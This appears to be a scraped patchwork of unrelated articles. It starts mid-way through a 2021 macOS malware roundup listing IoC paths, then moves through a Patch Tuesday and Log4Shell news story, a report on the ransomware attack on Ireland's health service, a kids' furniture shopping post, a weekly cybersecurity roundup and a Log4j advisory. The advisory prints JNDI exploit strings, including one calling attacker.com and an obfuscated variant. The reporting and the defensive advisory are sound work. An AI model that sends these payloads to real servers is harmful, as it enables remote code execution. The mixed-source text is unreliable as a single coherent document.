~/Library/Caches/GeoServices/.domain
~/Library/Caches/GeoServices/AppleKit

Notable Characteristics:

  • Infostealer
  • Uses Run-only AppleScripts (T1059.002)
  • Uses Python executables (T1059.006)
  • Uses SHC shell script compiler to obfuscate shell scripts
  • Uses a Launch Agent for persistence (T1543.001)
  • Attempts to hide as a system process (T1564.001)
  • Replaces Browser Dock Icon
  • Steals user data from Chrome, Contacts, Notes, Opera, Skype and others
  • Injects a payload into the build phase of local Xcode projects
  • Uses a Zero Day

9. OSX.Zuru

In September, macOS malware researcher @codecolorist noticed that sponsored links in the Baidu search engine were spreading malware via trojanized versions of iTerm2. A rapid triage by Patrick Wardle dubbed the malware “OSX.Zuru”. Subsequent investigation revealed that Microsoft’s Remote Desktop for Mac was also being trojanized with the same malware, as were SecureCRT and Navicat.

The selection of trojanized apps is interesting and suggests the threat actor was targeting users of backend tools used for SSH and other remote connections and business database management.

However, given that the only known distribution method to date relies on sponsored web searches, indications are that this is a “shotgun” approach in the hope of hovering up interesting targets rather than a specifically-targeted campaign.

The threat actor had modified the original application bundles with a malicious dylib in the .app/Contents/Frameworks/ folder called libcrypto.2.dylib. This downloads two further components: a python script dropped at /tmp/g.py and a heavily-obfuscated Mach-O dropped at /private/tmp/GoogleUpdate.

Analysis of this file reveals functionality for surveilling the local environment, reaching out to a C2 server and executing remote commands via a backdoor.

Primary IoCs:

/Applications/iTerm.app/Contents/Frameworks/libcrypto.2.dylib
/Applications/Microsoft Remote Desktop.app/Contents/Frameworks/libcrypto.2.dylib
/private/tmp/GoogleUpdate
/tmp/g.py

Notable Characteristics:

  • Backdoor
  • Uses a Mach-O executable
  • Uses Python (T1059.006)
  • Attempts to disguise itself as GoogleUpdate

10. macOS.Macma

In November, Google’s TAG published details of a threat they labelled macOS.Macma. Macma appears to be APT activity targeting, among others, Mac users visiting Hong Kong websites supporting pro-democracy activism. Both a zero day and a N-day (a known vulnerability with an available patch) were used at various points in the campaign; namely, a remote code execution (RCE) 0-day in WebKit and a local privilege escalation (LPE) in the XNU kernel.

The malware, which appears to date from at least 2019, is delivered in two distinct ways: one via trojanized app containing several malicious binaries and a shell script in its Resources folder; and two, by a watering-hole attack to visitors of certain websites.

It primarily functions as a keylogger, screen capturer, and backdoor.

macOS.Macma execution chain as seen in the SentinelOne console

Primary IoCs:

~/Library/LaunchAgents/com.UserAgent.va.plist
~/Library/Preferences/UserAgent/lib/UserAgent
~/Library/Preferences/Tools/arch
~/Library/Preferences/Tools/kAgent
~/Library/Preferences/Tools/at

Notable Characteristics:

  • Infostealer – Input Capture via Keylogger (T1056.001, T1056)
  • Uses a Zero Day
  • Uses a patched vulnerability, targeting users that failed to patch
  • Uses Mach-O executables
  • Uses a Launch Agent for persistence (T1543.001)

What Can We Learn From This Year’s macOS Malware?

It’s been said that the past is no reliable guide to the future (thanks, David Hume!), and that goes double when we are talking about malware trends, but there are certainly some interesting developments this year that we haven’t seen quite so pronounced in the past.

In the malware we’ve seen this year, we note first of all an increasing trend towards cross-platform development. This is something we have observed in the commodity adware market, too. Adload, for example, has been experimenting not only with malware written in Google’s Go language, but also in Kotlin.

Secondly, we note that a significant number of campaigns targeting macOS users either originated from or were targeted towards (or both) Chinese and Asian macOS users. This no doubt reflects a number of factors: the increasing importance of the macOS operating system in Asian markets, and an increasing familiarity with macOS development skills among macOS malware authors either from, or interested in, spying on that part of the world. Note that XCSSET, OSX.Zuru and macOS.Macma in particular show a high-level of familiarity with the macOS platform. However, XcodeSpy was discovered in a large, well-known U.S. organization, so it’s certainly not the case that all the recent macOS malware traffic is heading east.

We’ve also seen a number of attacks targeting software developers: XcodeSpy, XCSSET and XLoader all target environments that you might typically find on an enterprise developer’s Mac.

At least three of this year’s ten new malware families were also likely highly-targeted, possibly APT, attacks: XcodeSpy, WildPressure, and macOS.Macma all had very particular targets in mind and do not appear to be primarily financially motivated.

Similarly, the number of malware families whose primary function is espionage – backdoors, RATs, and keyloggers – is notable: 6 out of 10 of this year’s new macOS malware were aimed at spying on or taking over the computers of targets. Of the other four, two were loader platforms and two were related to cryptocurrency: either stealing it or mining it.

While threat actors expand their range of TTPs and seek to leverage known and undiscovered vulnerabilities, it is worth noting that by far the majority continue to rely on exploiting LaunchAgents for persistence. This offers plenty of opportunities for detection and protection. At the same time, security teams are advised to prepare for the possibility that threat actors will soon start to explore less obvious ways to persist.

Conclusion

For enterprises running macOS fleets, the message from this year’s malware discoveries is clear: threat actors are becoming increasingly interested in the macOS platform, are more familiar with how to exploit it, and are interested in high-value targets.

It is imperative for all security teams to prepare to defend against increasing numbers of increasingly sophisticated attacks on the Mac platform. SentinelOne and SentinelLabs has published several ebooks to help Mac admins, IT teams and security administrators further understand the risks and fortify their defenses, these include A Guide to macOS Threat Hunting and Incident Response and The Complete Guide to Understanding Apple Mac Security for Enterprise. Analysts may also wish to consult our How To Reverse Malware on macOS ebook as well as the SentinelLabs’ series of posts on reversing macOS malware with radare2.

The Complete Guide to Understanding Apple Mac Security for Enterprise
Learn how to secure macOS devices in the enterprise with this in-depth review of the strengths and weaknesses of Apple’s security technologies.

If you would like to learn more about how SentinelOne can help protect your Mac fleet, contact us for more information or request a free demo.

Microsoft Patch Tuesday, December 2021 Edition

Microsoft, Adobe, and Google all issued security updates to their products today. The Microsoft patches include six previously disclosed security flaws, and one that is already being actively exploited. But this month’s Patch Tuesday is overshadowed by the “Log4Shell” 0-day exploit in a popular Java library that web server administrators are now racing to find and patch amid widespread exploitation of the flaw.

Log4Shell is the name picked for a critical flaw disclosed Dec. 9 in the popular logging library for Java called “log4j,” which is included in a huge number of Java applications. Publicly released exploit code allows an attacker to force a server running a vulnerable log4j library to execute commands, such as downloading malicious software or opening a backdoor connection to the server.

According to researchers at Lunasec, many, many services are vulnerable to this exploit.

“Cloud services like Steam, Apple iCloud, and apps like Minecraft have already been found to be vulnerable,” Lunasec wrote. “Anybody using Apache Struts is likely vulnerable. We’ve seen similar vulnerabilities exploited before in breaches like the 2017 Equifax data breach. An extensive list of responses from impacted organizations has been compiled here.”

“If you run a server built on open-source software, there’s a good chance you are impacted by this vulnerability,” said Dustin Childs of Trend Micro’s Zero Day Initiative. “Check with all the vendors in your enterprise to see if they are impacted and what patches are available.”

Part of the difficulty in patching against the Log4Shell attack is identifying all of the vulnerable web applications, said Johannes Ullrich, an incident handler and blogger for the SANS Internet Storm Center. “Log4Shell will continue to haunt us for years to come. Dealing with log4shell will be a marathon,” Ullrich said. “Treat it as such.” SANS has a good walk-through of how simple yet powerful the exploit can be.

John Hultquist, vice president of intelligence analysis at Mandiant, said the company has seen Chinese and Iranian state actors leveraging the log4j vulnerability, and that the Iranian actors are particularly aggressive, having taken part in ransomware operations that may be primarily carried out for disruptive purposes rather than financial gain.

“We anticipate other state actors are doing so as well, or preparing to,” Hultquist said. “We believe these actors will work quickly to create footholds in desirable networks for follow-on activity, which may last for some time. In some cases, they will work from a wish list of targets that existed long before this vulnerability was public knowledge. In other cases, desirable targets may be selected after broad targeting.”

Researcher Kevin Beaumont had a more lighthearted take on Log4Shell via Twitter:

“Basically the perfect ending to cybersecurity in 2021 is a 90s style Java vulnerability in an open source module, written by two volunteers with no funding, used by large cybersecurity vendors, undetected until Minecraft chat got pwned, where nobody knows how to respond properly.”

A half-dozen of the vulnerabilities addressed by Microsoft today earned its most dire “critical” rating, meaning malware or miscreants could exploit the flaws to gain complete, remote control over a vulnerable Windows system with little or no help from users.

The Windows flaw already seeing active exploitation is CVE-2021-43890, which is a “spoofing” bug in the Windows AppX installer on Windows 10. Microsoft says it is aware of attempts to exploit this flaw using specially crafted packages to implant malware families like Emotet, Trickbot, and BazaLoader.

Kevin Breen, director of threat research for Immersive Labs, said CVE-2021-43905 stands out of this month’s patch batch.

“Not only for its high CVSS score of 9.6, but also because it’s noted as ‘exploitation more likely’,” Breen observed.

Microsoft also patched CVE-2021-43883, an elevation of privilege vulnerability in Windows Installer.

“This appears to be a fix for a patch bypass of CVE-2021-41379, another elevation of privilege vulnerability in Windows Installer that was reportedly fixed in November,” Satnam Narang of Tenable points out. “However, researchers discovered that fix was incomplete, and a proof-of-concept was made public late last month.”

Google issued five security fixes for Chrome, including one rated critical and three others with high severity. If you’re browsing with Chrome, keep a lookout for when you see an “Update” tab appear to the right of the address bar. If it’s been a while since you closed the browser, you might see the Update button turn from green to orange and then red. Green means an update has been available for two days; orange means four days have elapsed, and red means your browser is a week or more behind on important updates. Completely close and restart the browser to install any pending updates.

Also, Adobe issued patches to correct more than 60 security flaws in a slew of products, including Adobe Audition, Lightroom, Media Encoder, Premiere Pro, Prelude, Dimension, After Effects, Photoshop, Connect, Experience Manager and Premiere Rush.

Standard disclaimer: Before you update Windows, please make sure you have backed up your system and/or important files. It’s not uncommon for a Windows update package to hose one’s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.

So do yourself a favor and backup before installing any patches. Windows 10 even has some built-in tools to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.

And if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see this guide.

If you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there’s a decent chance other readers have experienced the same and may chime in here with useful tips.

Additional reading:

SANS ISC listing of each Microsoft vulnerability patched today, indexed by severity and affected component.

Inside Ireland’s Public Healthcare Ransomware Scare

The consulting firm PricewaterhouseCoopers recently published lessons learned from the disruptive and costly ransomware attack in May 2021 on Ireland’s public health system. The unusually candid post-mortem found that nearly two months elapsed between the initial intrusion and the launching of the ransomware. It also found affected hospitals had tens of thousands of outdated Windows 7 systems, and that the health system’s IT administrators failed to respond to multiple warning signs that a massive attack was imminent.

PWC’s timeline of the days leading up to the deployment of Conti ransomware on May 14.

Ireland’s Health Service Executive (HSE), which operates the country’s public health system, got hit with Conti ransomware on May 14, 2021. A timeline in the report (above) says the initial infection of the “patient zero” workstation happened on Mar. 18, 2021, when an employee on a Windows computer opened a booby-trapped Microsoft Excel document in a phishing email that had been sent two days earlier.

Less than a week later, the attacker had established a reliable backdoor connection to the employee’s infected workstation. After infecting the system, “the attacker continued to operate in the environment over an eight week period until the detonation of the Conti ransomware on May 14, 2021,” the report states.

According to PWC’s report (PDF), there were multiple warning signs about a serious network intrusion, but those red flags were either misidentified or not acted on quickly enough:

  • On Mar. 31, 2021, the HSE’s antivirus software detected the execution of two software tools commonly used by ransomware groups — Cobalt Strike and Mimikatz — on the Patient Zero Workstation. But the antivirus software was set to monitor mode, so it did not block the malicious commands.”
  • On May 7, the attacker compromised the HSE’s servers for the first time, and over the next five days the intruder would compromise six HSE hospitals. On May 10, one of the hospitals detected malicious activity on its Microsoft Windows Domain Controller, a critical “keys to the kingdom” component of any Windows enterprise network that manages user authentication and network access.
  • On 10 May 2021, security auditors first identified evidence of the attacker compromising systems within Hospital C and Hospital L. Hospital C’s antivirus software detected Cobalt Strike on two systems but failed to quarantine the malicious files.
  • On May 13, the HSE’s antivirus security provider emailed the HSE’s security operations team, highlighting unhandled threat events dating back to May 7 on at least 16 systems. The HSE Security Operations team requested that the Server team restart servers.

By then it was too late. At just after midnight Ireland time on May 14, the attacker executed the Conti ransomware within the HSE. The attack disrupted services at several Irish hospitals and resulted in the near complete shutdown of the HSE’s national and local networks, forcing the cancellation of many outpatient clinics and healthcare services. The number of appointments in some areas dropped by up to 80 percent.”

Conti initially demanded USD $20 million worth of virtual currency in exchange for a digital key to unlock HSE servers compromised by the group. But perhaps in response to the public outcry over the HSE disruption, Conti reversed course and gave the HSE the decryption keys without requiring payment.

Still, the work to restore infected systems would take months. The HSE ultimately enlisted members of the Irish military to bring in laptops and PCs to help restore computer systems by hand. It wasn’t until September 21, 2021 that the HSE declared 100 percent of its servers were decrypted.

As bad as the HSE ransomware attack was, the PWC report emphasizes that it could have been far worse. For example, it is unclear how much data would have been unrecoverable if a decryption key had not become available as the HSE’s backup infrastructure was only periodically backed up to offline tape.

The attack also could have been worse, the report found:

  • if there had been intent by the Attacker to target specific devices within the HSE environment (e.g. medical devices);
  • if the ransomware took actions to destroy data at scale;
  • if the ransomware had auto-propagation and persistence capabilities, for example by using an exploit to propagate across domains and trust-boundaries to medical devices (e.g. the EternalBlue exploit used by the WannaCry and NotPetya15 attacks);
  • if cloud systems had also been encrypted such as the COVID-19 vaccination system

The PWC report contains numerous recommendations, most of which center around hiring new personnel to lead the organization’s redoubled security efforts. But it is clear that the HSE has an enormous amount of work ahead to grow in security maturity. For example, the report notes the HSE’s hospital network had over 30,000 Windows 7 workstations that were deemed end of life by the vendor.

“The HSE assessed its cybersecurity maturity rating as low,” PWC wrote. “For example, they do not have a CISO or a Security Operations Center established.”

PWC also estimates that efforts to build up the HSE’s cybersecurity program to the point where it can rapidly detect and respond to intrusions are likely to cost “a multiple of the HSE’s current capital and operation expenditure in these areas over several years.”

One idea of a “security maturity” model.

In June 2021, the HSE’s director general said the recovery costs for the May ransomware attack were likely to exceed USD $600 million.

What’s remarkable about this incident is that the HSE is publicly funded by the Irish government, and so in theory it has the money to spend (or raise) to pay for all these ambitious recommendations for increasing their security maturity.

That stands in stark contrast to the healthcare system here in the United States, where the single biggest impediment to doing security well continues to be lack of making it a real budget priority. Also, most healthcare organizations in the United States are private companies that operate on razor-thin profit margins.

I know this because in 2018 I was asked to give the keynote at an annual gathering of the Healthcare Information Sharing and Analysis Group (H-ISAC), an industry group centered on sharing information about cybersecurity threats. I almost didn’t accept the invitation: I’d written very little about healthcare security, which seemed to be dominated by coverage of whether healthcare organizations complied with the letter of the law in the United States. That compliance centered on the Health Insurance Portability and Accountability Act (HIPPA), which prioritizes protecting the integrity and privacy of patient data.

To get up to speed, I interviewed over a dozen of the healthcare security industry’s best and brightest minds. A common refrain I heard from those interviewed was that if it was security-related but didn’t have to do with compliance, there probably wasn’t much chance it would get any budget.

Those sources unanimously said that however well-intentioned, it’s not clear that the “protect the data” regulatory approach of HIPPA was working from an overall threat perspective. According to HealthcareIT News, more than 40 million patient records have been compromised in incidents reported to the federal government in 2021 so far alone.

During my 2018 talk, I tried to emphasize the primary importance of being able to respond quickly to intrusions. Here’s a snippet of what I told that H-ISAC audience:

“The term ‘Security Maturity’ refers to the street smarts of an individual or organization, and this maturity generally comes from making plenty of mistakes, getting hacked a lot, and hopefully learning from each incident, measuring response times, and improving.

Let me say up front that all organizations get hacked. Even ones that are doing everything right from a security perspective get hacked probably every day if they’re big enough. By hacked I mean someone within the organization falls for a phishing scam, or clicks a malicious link and downloads malware. Because let’s face it, it only takes one screw up for the hackers to get a foothold in the network.

Now this is in itself isn’t bad. Unless you don’t have the capability to detect it and respond quickly. And if you can’t do that, you run the serious risk of having a small incident metastasize into a much larger problem.

Think of it like the medical concept of the ‘Golden Hour:’ That short window of time directly following a traumatic injury like a stroke or heart attack in which life-saving medicine and attention is likely to be most effective. The same concept holds true in cybersecurity, and it’s exactly why so many organizations these days are placing more of their resources into incident response, instead of just prevention.”

The United States’ somewhat decentralized healthcare system means that many ransomware outbreaks tend to be limited to regional or local healthcare facilities. But a well-placed ransomware attack or series of attacks could inflict serious damage on the sector: A December 2020 report from Deloitte says the top 10 health systems now control 24 market share and their revenue grew at twice the rate of the rest of the market.

In October 2020, KrebsOnSecurity broke the story that the FBI and U.S. Department of Homeland Security had obtained chatter from a top ransomware group which warned of an “imminent cybercrime threat to U.S. hospitals and healthcare providers.” Members associated with the Russian-speaking ransomware group known as Ryuk had discussed plans to deploy ransomware at more than 400 healthcare facilities in the United States.

Hours after that piece ran, I heard from a respected H-ISAC security professional who questioned whether it was worth getting the public so riled up. The story had been updated multiple times throughout the day, and there were at least five healthcare organizations hit with ransomware within the span of 24 hours.

“I guess it would help if I understood what the baseline is, like how many healthcare organizations get hit with ransomware on average in one week?” I asked the source.

“It’s more like one a day,” the source confided.

In all likelihood, the HSE will get the money it needs to implement the programs recommended by PWC, however long that takes. I wonder how many U.S.-based healthcare organizations could say the same.

Mid-Century Modern Furniture For Kids’ Room

Mid-century modern (MCM) style has always fascinated people worldwide. This is probably because of its unique functionality, combined with simple shapes and neat design details. As for kids’ rooms, there are plenty of options to decorate them in this unique style. All you need is to choose the right furniture pieces.

There are plenty of great mid-century modern options on the market, but we suggest going for pieces that are both stylish and functional. We have picked out some of our favorite pieces to help you create a stylish and comfortable kids’ room.

The best kids’ mid-century furniture

There are many of the fantastic mid-century modern kids’ furniture available on the market. We have compiled a list of the best pieces to help you get started.

Kids’ mid century chair

One of our favorite pieces of furniture for kids’ rooms is the mid-century modern chair. These chairs for kids come in various shapes and sizes, but they all have one common feature – simplicity. This makes them perfect for any type of room, and they will easily complement the overall design.

IKARE Wooden Natural Baby High Chair

If you are looking for a stylish and functional high chair, we suggest going for the IKARE Wooden Natural Baby High Chair. This chair is perfect for kids aged 6 months and up, and it features a beautiful mid-century modern design. It is made of natural wood, which makes it both sturdy and stylish, and it will easily blend in with any room decor.

This mid-century modern high chair is designed to match right up to your dining table so that your infant may eat, play with toys, learn, and grow alongside you. Because the footplate is height-adjustable and the food tray can be removed, you may adjust the high chair when your child grows. This high chair includes a full-size high chair, a booster seat, and a toddler chair in one! With three must-have baby seats in one, this high chair has it all!

IKARE Wooden Natural Baby High Chair is constructed of beech hardwood that is durable, shock-absorbent, and shock-resistant. It includes a PP seat design that helps to enhance comfort and fatigue resistance. Comfort, balance, and ergonomics are all improved by solid construction. Your baby’s safety is most important, after all! The chair includes a 5-point safety harness system with shoulder pads and a crotch strap to offer the safest seating for your child.

KidKraft Mid-Century Kid Upholstered Reading Chair & Ottoman with Storage

Another great piece that we suggest for your kid’s room is the KidKraft Mid-Century Kid Upholstered Reading Chair and Ottoman with Storage. This kids’ reading chair features a vintage mid-century classic style, and it will quickly bring some class to your kids’ room decor. It is also very comfortable, which means that your child will be able to relax and read in style.

The chair also comes with an ottoman, which can be used as a storage unit. This is a great feature, as it will help you keep the room neat and organized. The ottoman is also very comfortable, and it will be perfect for your child to relax on.

The KidKraft Mid-Century Kid Upholstered Reading Chair and Ottoman with Storage is made of wood, making it both strong and durable. The chair is upholstered in a soft fabric, which will make it very comfortable for your child.

DIAOD Mid-Century Modern Footstool

This adorable little footstool is perfect for any kids’ room. It features a mid-century modern design, easily matching most room decor styles. It is also very comfortable, which means that your child will love to use it while playing or watching TV.

This footstool is made of plywood and fabric, so it is both lightweight and sturdy. It is effortless to move around, but it won’t be easily tipped over. The DIAOD Mid-Century Modern Footstool comes in a variety of stylish colors, so you will surely find one that matches your child’s room decor.

Christopher Knight Home Evelyn Mid Century Modern Fabric Arm Chair

With its beautiful vintage design, this armchair is a must-have for fans of the classic style. This comfy choice boasts four sturdy walnut legs, adding to the appeal of this elegant chair. The easy-to-clean fabric is perfect for busy households, and the high-density foam provides hours of relaxation.

The Evelyn Mid Century Modern Fabric Arm Chair would look great in any room and would make a perfect place for your child to relax with a good book or watch TV. The chair is also very comfortable, so your child will be able to enjoy it for hours on end.

KidKraft Mid-Century Kid Wooden Corner Reading Nook

This KidKraft Mid-Century Kid Wooden Corner Reading Nook is perfect for any kid who loves to read. It features an adorable design with adjustable shelves, making it easy to customize the nook according to your child’s needs.

Your child will love spending their time in this corner reading nook! The high back and soft cushions will make it a very comfortable place to relax. The nook is also very spacious, so your child will have plenty of room to spread out.

The product is very versatile, as it would work perfectly in any bedroom. It will help to keep your child’s room organized and neat.

AOKAEII High Back Rocker Chair & Ottoman

A staple piece in a nursery! This chair is perfect for mothers and fathers to read to their children, nurse them or just spend some quality time together. The AOKAEII High Back Rocker Chair & Ottoman is a stylish and comfortable choice that easily complements any nursery decor.

The sturdy solid rubberwood base construction gives stability when rocking. When you sit down, you feel as if you’re lying down naturally. The glider rocker has a footrest, which adds to the chair’s stability. This chair can bear up to 300 pounds.

The AOKAEII High Back Rocker Chair & Ottoman are made of the best quality materials: the 40-density high-elastic sponge is thicker and more resilient than other sponges. It’s worn with soft, high-quality linen fabrics that are both delicate and robust. It has a cushiony, wear-resistant feel and is skin-friendly and easy to maintain.

Kids’ activity tables and desks in mid-century modern style

If your kid loves to draw, color, and do other types of arts & crafts activities, a kids’ activity table is an essential piece of furniture. A good activity table should be very sturdy and durable so that it can withstand hours of use.

Milliard Kids Mid Century Modern Table and Chair Set Wooden with Storage Baskets

This great kids’ activity table is a fantastic choice for home and school use. It boasts two large storage baskets, which will help to keep your child’s room neat and organized at all times.

This table and chairs set are ideal for coloring, tea parties, car races, and so much more because it is the perfect size for young ones. This collection boasts a white and brown mid-century modern design that is appropriate in any house room.

The sturdy construction of this activity table, which is made out of Pine and MDF wood, makes it ideal for children to use. The table and chairs have been subjected to independent tests by an independent consumer organization for strength and safety.

Wildkin Kids Modern Study Desk with Storage and Stool

With Wildkin’s children’s desk and chair set, cater to your child’s creative side! This kids’ table and chair set is sized just right for small children looking for somewhere to let their imaginations run wild. This sturdy and sleek design makes this a great addition to bedrooms, playrooms, or living rooms.

Wildkin’s table and chairs for little ones include a storage area beneath for the child’s books, pencils, and other supplies. The desk table’s stain-resistant melamine top and tough natural wood legs guarantee that Wildkin’s desk for kids with storage and desk stool set will withstand any little artist. This desk and stool’s classic, timeless solid wood legs are both durable and safe for the kids.

Mid-century modern storage solutions for kids

Finally, we suggest that you don’t forget about toys and storage solutions. For example, an elegant wooden toy box with a sleek design would be a great option. This way, you can keep all of your precious items organized while providing an attractive storage unit for your children’s toys at the same time.

KidKraft Mid-Century Kid Bin Storage Unit

Storage units in mid-century modern style are surprisingly challenging to find. That’s why we were so happy to discover this stylish bin storage unit by KidKraft. It can be used in any part of the house, but it is ideal for bedrooms and playrooms.

The KidKraft Mid-Century Kid Bin Storage Unit is made of sturdy wood construction and a beautiful white and grey finish. It has two large bins that are perfect for storing toys, clothes, books, and other items. The bins are also removable so that they can be easily cleaned. The top of this storage unit features two open regions ideal for storing toys you want to be easily accessible.

The popular mid-century modern design style is represented by the clean lines, rounded feet, and geometric pattern on the back wall. Get the toy organization you need and the style you crave with this KidKraft storage unit.

The origins of Mid-Century Modern

Mid-century modern design was born out of the cultural zeitgeist after World War II. According to James A. Bier, Ph.D., Curator at the Smithsonian’s National Museum of American History, Americans were “reflecting on what they had done…through the creation of this weapon.” As a result, many designers began to focus on new ways to improve daily life and make it more comfortable.

One of the most iconic aspects of mid-century modern design is its organic shapes and natural materials. This was a reaction against the stark, angular lines of Art Deco and the over-the-top luxury of the previous era. Mid-century designers favored simple forms and minimal ornamentation, resulting in sleek furniture that was as comfortable as it was stylish.

Mid-century modern also focused on creating designs with a sense of lightness and balance, no matter how outlandish the shapes became. According to Bier, this style “is really about removing barriers between people and objects.” Many homeowners found they could combine pieces from different manufacturers and still have a cohesive look.

Mid-century modern was not just a design style but an entire way of life. It embraced both the city and the country, emphasizing simple living with access to modern conveniences like dishwashers, TVs, and garage doors. This generation popularized vibrant colors because they wanted to bring happiness and brightness into their homes.

If you’re looking to add a touch of mid-century modern to your home, start by incorporating natural materials like wood, metal, and glass. Keep the lines simple and avoid excessive ornamentation. Colors should be light and bright, emphasizing cool neutrals and pastels. And finally, keep an eye out for furniture pieces that are sleek, streamlined, and comfortable.

Mid-century modern designs also had a certain uniformity because of the post-war mentality “Good design was democratic” stated by George Nelson in 1976. Although there was never a clearly defined set of standards for mid-century modern homes, most houses built during this era shared similar characteristics, such as large expanses of glass, open floor plans, and a connection to the outdoors.

As we move further into the 21st century, mid-century modern design is becoming more popular than ever. If you’re looking for a way to add some timeless style to your home, look no further than mid-century modern.

Is Mid-Century Modern still in style?

Yes! Mid-century modern design is more popular than ever and shows no signs of slowing down. Mid-century modern is timeless and elegant, making it an excellent choice for those who want their home to be stylish as well as functional.

Mid-century furniture designs are a massive inspiration for interior designers because of the wide range of pieces available and the simplicity of the line. Mid-century modular sofas allow many homeowners to create their dream living room with the perfect seating arrangement.

Mid-century modern also offers homeowners a wide range of design possibilities, from sleek and simple to bold and dynamic. There’s no “one size fits all” approach to mid-century decor.

Is Mid-Century Modern furniture expensive?

No! Although some mid-century modern pieces are rare or one-of-a-kind antiques, many affordable reproductions can be found in furniture stores and online. You don’t have to spend a fortune to add some mid-century style to your home.

What are the Advantages and Disadvantages of Mid-Century Modern Design?

Mid-century modern has many advantages that continue to make it popular today. First of all, the clean, modern lines are easy to maintain, making it a great choice for homeowners who want stylish furniture but don’t require much upkeep. Mid-century modern also has a classic feel to it, which never goes out of style.

Mid-century design is focused on creating sleek and functional furniture while being comfortable at the same time. This means that many of the pieces are versatile and can be used in various settings.

However, one disadvantage of mid-century modern design is that it can be difficult to find unique pieces. Since the style is so popular, many iconic designs have been reproduced multiple times. So, if you’re looking for something truly one-of-a-kind, you may have to search harder (and for a much higher price).

The post Mid-Century Modern Furniture For Kids’ Room appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 50

The Good

This week we have another law enforcement victory to highlight. The grand jury indictment (in USA and Canada) of Mathew Philbert was the result of “Project CODA”, a joint operation between Europol, the FBI, and Canada’s Ontario Provincial Police (O.P.P.). Project CODA began in early 2020 after the FBI contacted Canadian law enforcement for help with an investigation into various ransomware attacks on U.S. businesses originating in Canada.

Philbert, described as one of Canada’s “most prolific cybercriminals’, was formally charged in connection with numerous claims of fraud and cyber crime, including ransomware attacks and bot operation. The indictment covers multiple counts from the 2018 timeframe, though the individual is allegedly tied to a host of other attacks dating back many years. Authorities also seized a plethora of laptops, phones, drives, carding blanks, and crypto-wallet metadata that assist in tying Philbert to the crimes.

Philbert was notoriously one of the original Darkode forum members back in 2009, as well as being active on many other established underground forums and markets. He has also been tied to the operation of at least one Mariposa-based botnet. Perhaps the most eye-opening aspect of the charges is the clear indication that Philbert was attacking medical facilities during the alleged time.

“On or about April 28, 2018, within the District of Alaska and elsewhere, the defendant, MATTHEW PHILBERT, knowingly caused and attempted to cause the transmission of a program, information, code, and command, and, as a result of such conduct, intentionally caused and attempted to cause damage without authorization to a protected computer owned by the State of Alaska, and the offense caused and would, if completed, have caused: (a) the modification, impairment, and potential modification and impairment of the medical examination, diagnosis, treatment and care of 1 or more individuals; (b) a threat to public health and safety; and, (c) damage affecting 10 or more protected computers during a 1-year period.”

While the events in question predate the current global situation, any attack on a medical entity is reprehensible, so we have one more victory for global law enforcement to cheer and one less prolific criminal off the grid. Hooray!

The Bad

This was a rough week for the retail industry with regard to ransomware attacks. North of 300 outlets of the SPAR supermarket chain were affected by an apparent ransomware incident. As a result of the attack, many locations were forced to close, while others had to resort to processing transactions on paper.

A SPAR spokesperson stated that the attack was:

“impacting stores’ ability to process card payments meaning that a number of SPAR stores are currently closed to shoppers or are taking only cash payments.”

At the time of writing, there is no clear indication of the ransomware family involved, nor is there any detail on the payment status of the ransom.

A similar scenario played out at The Delta-Montrose Electric Association (DMEA). The member-owned electric cooperative in Colorado has also revealed they were the subject of a breach, including the use of “file-encrypting malware”. At the time, the attack led to nearly 90% of their internal systems being out or affected in a negative way. As with the SPAR situation, there is currently no confirmed data on which ransomware family was involved.

Both victims are on the road to recovery, but these attacks serve as a reminder of the importance of prevention when it comes to ransomware.

The Ugly

Life in Russia became much more difficult for TOR users this week. On December 1, Russia’s Roskomnadzor (aka the Federal Service for Supervision of Communications, Information Technology, and Mass Media) started blocking traffic on TOR nodes. That was followed this week by a block on access to TOR’s main site.

Attempting to explain the reasons for the action, a spokesperson for Roskomnadzor said:

“The grounds were the spreading of information on the site ensuring the work of services that provide access to illegal content…Today, access to the resource has been restricted.”

The country’s crackdown on Tor is just the latest in a wave of censorships over the last few months that have seen Apple forced to turn off its Private Relay service, Opera to remove its browser’s VPN and ten other VPNs being blocked. In response to the latest action, the TOR team have created a website mirror which can be persistently accessed, even by citizens in Russia.

Meanwhile, a non-amateur level and persistent group threat actor has been running thousands of TOR relays for at least four years in what looks like a systematic Sybil attack, essentialy an attempt to deanonymize TOR traffic or collect information on users to map their routes through the network.

It is estimated that, at one point, as much as 10% of the TOR network could have been under the control of a single entity. All the identified servers have been removed, but researchers believe the effort is ongoing and are actively hunting for more suspicious relays.

CVE-2021-44228: Staying Secure – Apache Log4j Vulnerability

Executive Summary

  • A new critical remote code execution vulnerability in Apache Log4j2, a Java-based logging tool, is being tracked as CVE-2021-44228.
  • Exploit proof-of-concept code is widely available and internet wide scanning suggests active exploitation.
  • At the time of writing, exploit attempts lead to commodity cryptominer payloads. SentinelOne expects further opportunistic abuse by a wide variety of attackers, including ransomware and nation-state actors.
  • Major services and applications globally are impacted by the vulnerability due to the prevalence of Log4j2s use in many web apps.
  • Due to the ease and rate of exploitation attempts, SentinelOne recommends upgrading impacted services to the latest version of Log4j2.

Background

On December 9th, 2021, the security community became aware of active exploitation attempts of a vulnerability in Apache Log4j 2. The vulnerability in question is trivially easy to exploit and consists of a malformed Java Naming and Directory Interface (JNDI) request of the form ‘${jndi:ldap://attacker.com/file}` (further variations are documented below). It’s difficult to assess the extent of possible impact as Log4j2 is used across a variety of products and services, from Apache products like Struts, Solr, and Flink to security products like ElasticSearch, Logstash, and Kafka, and even Minecraft servers. Defenders are encouraged to update any explicit uses of Log4j 2 to version 2.15.0-rc2 or higher, as well as scrutinize other services that may implicitly rely on it.

As described in the NVD vulnerability disclosure, JNDI features do not protect against requests pointing to attacker-controlled endpoints including LDAP(s), DNS, and RMI requests. The requests poll an attacker endpoint for a file that’s then executed in the context of the Log4j 2 service.

Examples:

${jndi:ldap:///}  

${jndi:dns:///} 

${jndi:ldap://${env:}./}

Further variants of the malicious request have been publicly reported and include slight obfuscation with nested functions like ${lower:} as follows:

${jndi:${lower:l}${lower:d}ap:///}

At the time of writing, payloads include cryptominers like Golang-based Kinsing ELF payloads but there’s nothing limiting the potential for abuse as attackers ramp up their infrastructure and tooling to take advantage of this exploitation opportunity.

